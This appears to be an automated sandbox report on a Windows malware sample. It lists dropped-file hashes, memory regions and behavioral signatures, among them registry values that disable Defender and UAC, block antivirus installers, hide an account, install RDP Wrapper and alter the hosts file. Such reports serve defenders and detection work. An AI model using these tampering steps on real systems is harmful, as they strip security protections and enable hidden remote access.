| SHA512 | 3c6d36666086ffe13a09e4decc4956b0b15888de0ae457dabe29ed7e1195ec145cd1adc61e48fd7dc6eb8f0c94b69d5e2fb04bf75d9e456be0ca11289516381b |
\ProgramData\Microsoft\Intel\R8.exe
| MD5 | 5f431f5ee701e752911ac4b7b164374c |
| SHA1 | 42109caf54679e668b792404157dd3ce9dec86de |
| SHA256 | 8dfda367599ca982201c273cebf8b7ae03ccdbdec269cf164e814b94b90d0f54 |
| SHA512 | 1af73a30b0e112b83ca1ea8bf3e822ccaa2bd6518be8e8f07f06a7441323efcd64168033d53989611f725e4f5f57ae10fc0ddc0e7a62dcae21110bc7edb34149 |
\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
memory/1704-183-0x0000000002430000-0x0000000002AE9000-memory.dmp
memory/2968-185-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2968-184-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2968-187-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2968-188-0x0000000000400000-0x0000000000AB9000-memory.dmp
C:\rdp\run.vbs
| MD5 | 6a5f5a48072a1adae96d2bd88848dcff |
| SHA1 | b381fa864db6c521cbf1133a68acf1db4baa7005 |
| SHA256 | c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe |
| SHA512 | d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c |
memory/2968-186-0x0000000000400000-0x0000000000AB9000-memory.dmp
C:\rdp\pause.bat
| MD5 | a47b870196f7f1864ef7aa5779c54042 |
| SHA1 | dcb71b3e543cbd130a9ec47d4f847899d929b3d2 |
| SHA256 | 46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba |
| SHA512 | b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60 |
memory/2788-195-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2968-193-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2968-189-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2788-197-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2788-199-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2788-198-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2788-196-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2788-200-0x0000000000400000-0x0000000000AB9000-memory.dmp
C:\ProgramData\Microsoft\Intel\winlog.exe
| MD5 | 4b2dbc48d42245ef50b975a7831e071c |
| SHA1 | 3aab9b62004f14171d1f018cf74d2a804d74ef80 |
| SHA256 | 54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724 |
| SHA512 | f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd |
\ProgramData\Microsoft\Intel\winlogon.exe
| MD5 | 2f6a1bffbff81e7c69d8aa7392175a72 |
| SHA1 | 94ac919d2a20aa16156b66ed1c266941696077da |
| SHA256 | dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de |
| SHA512 | ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37 |
memory/2784-216-0x00000000036D0000-0x00000000036E9000-memory.dmp
memory/1164-218-0x0000000000400000-0x0000000000419000-memory.dmp
C:\ProgramData\SystemIdle.exe
| MD5 | 0bd6e68f3ea0dd62cd86283d86895381 |
| SHA1 | e207de5c580279ad40c89bf6f2c2d47c77efd626 |
| SHA256 | a18b0a31c87475be5d4dc8ab693224e24ae79f2845d788a657555cb30c59078b |
| SHA512 | 26504d31027ceac1c6b1e3f945e447c7beb83ff9b8db29d23e1d2321fc96419686773009da95ef6cd35245788f81e546f50f829d71c39e07e07e1fecbf2d8fd4 |
C:\Users\Admin\AppData\Local\Temp\aut34A3.tmp
| MD5 | 427c2b9f0563b700d3b2b86b4aaac822 |
| SHA1 | 34ae6f73ac9f4f463143cf2c993d8c88e6358f53 |
| SHA256 | fac97f4ba819d30670802676c4d149a13928ca093ef7e6aa1edd98b419144f22 |
| SHA512 | c487aa356c645dbd019a517741720f655301b9a55ab6a9e39665c1f7a0f2d5a5a1d734ea3c7d42c8822d6e3c00dc3c6d68bb556e5ef2c33e8daf422a70d473e7 |
memory/2788-231-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2052-238-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2052-244-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2052-243-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2052-242-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2052-240-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2052-239-0x0000000000400000-0x0000000000AB9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\342A.tmp\342B.bat
| MD5 | cfc53d3f9b3716accf268c899f1b0ecb |
| SHA1 | 75b9ae89be46a54ed2606de8d328f81173180b2c |
| SHA256 | f293caa096cc51a511cedd76fd011a275fb8a30b6a93542ded718930a7d12ee9 |
| SHA512 | 0c090e2ed2f3f7b2c00cbb6583df5723a3d0781738eafc37b2e630f46b5b470a5a7dbc44a2f2e8d043f83c753ddf5f72b1d67c0a7e73241e47cd24c92b4ce7d4 |
memory/344-291-0x000000001B6E0000-0x000000001B9C2000-memory.dmp
memory/344-292-0x00000000022D0000-0x00000000022D8000-memory.dmp
memory/1040-297-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1040-295-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1040-296-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1040-294-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1040-293-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/344-299-0x0000000002970000-0x0000000002982000-memory.dmp
memory/344-301-0x0000000002A20000-0x0000000002A2E000-memory.dmp
memory/344-302-0x0000000002A30000-0x0000000002A38000-memory.dmp
memory/344-300-0x0000000002990000-0x000000000299A000-memory.dmp
C:\ProgramData\microsoft\Temp\5.xml
| MD5 | 487497f0faaccbf26056d9470eb3eced |
| SHA1 | e1be3341f60cfed1521a2cabc5d04c1feae61707 |
| SHA256 | 9a8efbd09c9cc1ee7e8ff76ea60846b5cd5a47cdaae8e92331f3b7b6a5db4be5 |
| SHA512 | 3c6b5b29c0d56cfd4b717a964fac276804be95722d78219e7087c4ec787566f223e24421e0e3e2d8a6df5f9c9a5c07f1935f4ba7a83a6a3efa84866e2c1405dd |
memory/1040-323-0x0000000003300000-0x00000000038B6000-memory.dmp
memory/1164-321-0x0000000000400000-0x0000000000419000-memory.dmp
memory/2900-325-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/2900-330-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/2968-324-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/2052-344-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2968-342-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/2968-341-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/2968-340-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/2968-339-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/2968-332-0x0000000000400000-0x00000000009B6000-memory.dmp
C:\ProgramData\Microsoft\Intel\Vegas.exe
| MD5 | 30582dfb10c2eb7deaaa1d99b527f064 |
| SHA1 | 0dda4940ede6a790ab51b21110017e47fe9e7521 |
| SHA256 | 6f833c0bf680e2c3d345f10619a872f78ede66871052e3501c5444333afcf70f |
| SHA512 | e920b8ea074f20041a048173a4378e1f93ab44facecbf3484a5e1392ec3b18e3745e20eb39a5968914811340eb49553f6bbc155a48fbce28e1ace3a079d78eb5 |
memory/2900-329-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/2900-328-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/2900-327-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1276-476-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1276-483-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1276-481-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1276-480-0x0000000000400000-0x00000000009B6000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | 2850badee11885b60758cb1ee660ee60 |
| SHA1 | 1940e47596e335e56590454cc3e94195edadbffc |
| SHA256 | eb72f90e32ca516131b0d058776743938e9ab5c0b10c60957eb8c14eb3956921 |
| SHA512 | 87df40e12d57befdd98d4352ed89e80df240546e8d95b0320e2cf707ae679c4c1af36be65cfc4199ac84a727b30cd325285519bc0929eab988340bcdf4249b38 |
memory/1276-484-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1276-482-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1276-492-0x0000000000400000-0x00000000009B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab5E66.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
memory/1040-543-0x0000000000400000-0x0000000000AB9000-memory.dmp
C:\ProgramData\Install\del.bat
| MD5 | ed57b78906b32bcc9c28934bb1edfee2 |
| SHA1 | 4d67f44b8bc7b1d5a010e766c9d81fb27cab8526 |
| SHA256 | c3a1bd76b8539fdf83b723f85b6ea7cd35104b0ec14429774059208d2660177d |
| SHA512 | d2a95257e37b4b4154aec2234e31423632598a870d2bb803ce27cb242d5bdff5ea1b7475577245f80d3ad069872e9ae2adcd05d5145e081db864185a5e7bda33 |
memory/2968-580-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/2900-582-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1168-657-0x0000000000400000-0x000000000056F000-memory.dmp
memory/1040-689-0x0000000000400000-0x0000000000AB9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab8AB5.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar8AC7.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/2900-745-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1168-790-0x0000000000400000-0x000000000056F000-memory.dmp
memory/1084-848-0x0000000000400000-0x000000000056F000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | 4fb01d026830587891a6d0b1f6928152 |
| SHA1 | e10bc0625f03b0a136b876c565a4d58d659ea078 |
| SHA256 | 805998929bc56fe52c1611ca4b68ffbf654e7e49dd2f0e212b9275ed4b176978 |
| SHA512 | 38f0c4e6e1482740c34f976330d174f2624459fcf534d351b056924ab89f347a939f7f067b5e352c1c307bb14bc145f6f0db2fd1d5344cd11e2ba74fa1ceda41 |
memory/1040-882-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2900-905-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1040-965-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2900-968-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1040-969-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1040-976-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2900-978-0x0000000000400000-0x00000000009B6000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-19 07:13
Reported
2024-06-19 07:16
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
145s
Command Line
Signatures
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Modifies visiblity of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
RMS
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\regedit.exe | N/A |
Grants admin privileges
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocks application from running via registry modification
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
Possible privilege escalation attempt
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | C:\rdp\RDPWInst.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Stops running service(s)
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\programdata\microsoft\intel\Vegas.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | \??\c:\Programdata\Microsoft\Intel\Cheat64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\Logs.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\winit.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\winlog.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\Vegas.sfx.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\programdata\microsoft\intel\MOS.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\programdata\microsoft\intel\winlogon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\Cheat.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\programdata\microsoft\intel\P.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\programdata\microsoft\intel\R8.exe | N/A |
Cryptocurrency Miner
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Modifies file permissions
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\rdp\RDPWInst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\rfxvmt.dll | C:\rdp\RDPWInst.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
